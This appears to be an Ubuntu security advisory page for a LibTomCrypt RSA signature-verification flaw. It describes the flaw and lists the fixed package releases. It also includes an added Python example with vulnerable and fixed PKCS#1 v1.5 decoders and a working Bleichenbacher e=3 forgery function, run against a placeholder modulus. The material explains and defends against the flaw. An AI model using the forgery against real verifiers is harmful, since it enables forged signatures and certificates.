

Published: 13 February 2017

The rsa_verify_hash_ex function in rsa_verify_hash.c in LibTomCrypt, as used in OP-TEE before 2.2.0, does not validate that the message length is equal to the ASN.1 encoded data length, which makes it easier for remote attackers to forge RSA signatures or public certificates by leveraging a Bleichenbacher signature forgery attack.

From the Ubuntu security team

It was discovered that LibTomCrypt incorrectly handled RSA signatures or public certificates. An attacker could possibly use this issue to make a Bleichenbacher signature forgery attack.
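The two descriptions above refer to the same defect: after stripping the PKCS#1 v1.5 padding, the verifier parsed the DER-encoded DigestInfo but never checked that the DigestInfo ended exactly where the encoded message ended, so any bytes following it were silently ignored. With a small public exponent (e = 3) that slack is enough for Bleichenbacher's 2006 forgery: an attacker places the padding and DigestInfo at the top of the encoded message, treats the rest as free bits, and takes an integer cube root to obtain a "signature" with no private key. The following is an added example, not LibTomCrypt or Ubuntu code: a pure Python 3 stdlib implementation of a lenient decoder (the vulnerable behaviour), a strict decoder (the fixed behaviour), and the forgery itself. The 2048-bit modulus is a constructed placeholder; the attack does not depend on its factorisation, only on e = 3 and the modulus being large enough to hold the cube.

```python
"""
Added example (not LibTomCrypt code): RSA PKCS#1 v1.5 signature decoding with
and without the "DigestInfo must consume the whole payload" check, plus the
e=3 forgery that the lenient variant accepts.  Python 3 standard library only.
"""
import hashlib

# DER prefix of a SHA-256 DigestInfo (RFC 8017, section 9.2, note 1).
SHA256_DIGESTINFO_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")
SHA256_LEN = 32

# Constructed placeholder modulus: any 2048-bit odd number works for the forgery
# because the forged cube never wraps modulo n.  This is NOT a real RSA key.
N_PLACEHOLDER = (1 << 2048) - 1
E_SMALL = 3


def icbrt(n: int) -> int:
    """Largest integer s with s**3 <= n (binary search on big ints)."""
    lo, hi = 0, 1 << ((n.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= n:
            lo = mid
        else:
            hi = mid - 1
    return lo


def strip_padding(em: bytes):
    """Strip EMSA-PKCS1-v1_5 padding 00 01 FF..FF 00 (at least 8 FF bytes).
    Returns the payload after the 00 separator, or None if malformed."""
    if len(em) < 11 or em[0] != 0x00 or em[1] != 0x01:
        return None
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= len(em) or em[i] != 0x00:
        return None
    return em[i + 1:]


def parse_digestinfo(t: bytes):
    """Parse a SHA-256 DigestInfo at the front of t.  Returns (digest, consumed)
    or None; 'consumed' mirrors what a DER decoder reports as bytes read."""
    if not t.startswith(SHA256_DIGESTINFO_PREFIX):
        return None
    consumed = len(SHA256_DIGESTINFO_PREFIX) + SHA256_LEN
    if len(t) < consumed:
        return None
    return t[len(SHA256_DIGESTINFO_PREFIX):consumed], consumed


def decode_lenient(em: bytes):
    """Vulnerable: accepts once a DigestInfo parses; trailing bytes are ignored."""
    t = strip_padding(em)
    if t is None:
        return None
    r = parse_digestinfo(t)
    return None if r is None else r[0]


def decode_strict(em: bytes):
    """Fixed: the DigestInfo must end exactly at the end of the encoded message."""
    t = strip_padding(em)
    if t is None:
        return None
    r = parse_digestinfo(t)
    if r is None or r[1] != len(t):
        return None
    return r[0]


def encode_pkcs1_v15(digest: bytes, k: int) -> bytes:
    """Genuine EMSA-PKCS1-v1_5 encoding of a SHA-256 digest into k bytes."""
    t = SHA256_DIGESTINFO_PREFIX + digest
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def forge_signature(msg: bytes, k: int) -> int:
    """Bleichenbacher e=3 forgery: minimal padding + DigestInfo at the top,
    the remaining k-62 bytes free, then s = ceil(cbrt(target)).  Because the
    free region (1552 bits here) exceeds 2/3 of the target's bit length, s**3
    keeps the exact prefix and differs only in the ignored trailing bytes."""
    digest = hashlib.sha256(msg).digest()
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + SHA256_DIGESTINFO_PREFIX + digest
    free_bits = 8 * (k - len(prefix))
    target = int.from_bytes(prefix, "big") << free_bits
    s = icbrt(target)
    if s ** E_SMALL < target:
        s += 1  # round up so the cube starts with exactly `prefix`
    return s


def verify(msg: bytes, sig: int, n: int, e: int, decode) -> bool:
    """RSA verify: em = sig^e mod n, decode with the given decoder, compare digest."""
    k = (n.bit_length() + 7) // 8
    em = pow(sig, e, n).to_bytes(k, "big")
    digest = decode(em)
    return digest is not None and digest == hashlib.sha256(msg).digest()


def demo(msg: bytes = b"constructed message: pay 1000 to attacker") -> dict:
    """Runs the forgery against both decoders and a genuine encoding through strict."""
    k = (N_PLACEHOLDER.bit_length() + 7) // 8
    forged = forge_signature(msg, k)
    genuine_em = encode_pkcs1_v15(hashlib.sha256(msg).digest(), k)
    return {
        "lenient_accepts_forgery": verify(msg, forged, N_PLACEHOLDER, E_SMALL, decode_lenient),
        "strict_accepts_forgery": verify(msg, forged, N_PLACEHOLDER, E_SMALL, decode_strict),
        "strict_accepts_genuine": decode_strict(genuine_em) == hashlib.sha256(msg).digest(),
    }


if __name__ == "__main__":
    print(demo())
```

The fix is the single `r[1] != len(t)` comparison in `decode_strict`: the decoded DigestInfo length must equal the length of the data remaining after the padding separator. Without it, the verifier checks the digest it was handed rather than the digest the signer committed to, and with e = 3 the attacker can choose the free bytes so that an integer cube root exists. Larger exponents (e = 65537) make the same length slack far harder to exploit, but the check is required for correctness regardless of exponent.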



CVSS 3 base score: 7.5


Package Release Status (links: Launchpad, Ubuntu, Debian)

Release                            Status
Upstream                           Needs triage
Ubuntu 18.04 LTS (Bionic Beaver)   Not vulnerable
Ubuntu 16.04 ESM (Xenial Xerus)    Released (1.17-7ubuntu0.1)
Ubuntu 14.04 ESM (Trusty Tahr)     Released (1.17-5ubuntu0.1)